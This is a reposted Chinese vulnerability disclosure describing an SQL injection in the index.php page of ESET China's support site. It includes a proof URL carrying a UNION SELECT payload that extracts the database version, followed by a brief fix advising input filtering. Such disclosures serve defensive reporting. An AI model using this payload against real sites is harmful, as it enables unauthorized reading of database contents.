日期:2010-09-07 00:18:00 来源:本站整理
ESET中国站点存在注入漏洞及修复[网络技术]
本文“ESET中国站点存在注入漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
扼要描写:
变量未举行过滤,招致注入漏洞产生.
具体阐明:
index.php页面中的变量未举行过滤,可获得服务器信息基本,也可直接读取站点数据表内容.
漏洞证明:
http://support.eset.com.cn/activation/ess/index.php?code=79&LNG=CHS&type=act%27%20and%201=2%20union%20select%20unhex%28hex%28concat%280x5e,version%28%29,0x5e%29%29%29,0%20/*%20and%20%271%27=%271
修复筹划:
对变量举行过滤.
以上是“ESET中国站点存在注入漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“ESET中国站点存在注入漏洞及修复”更多相关内容
中查找“ESET中国站点存在注入漏洞及修复”更多相关内容评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论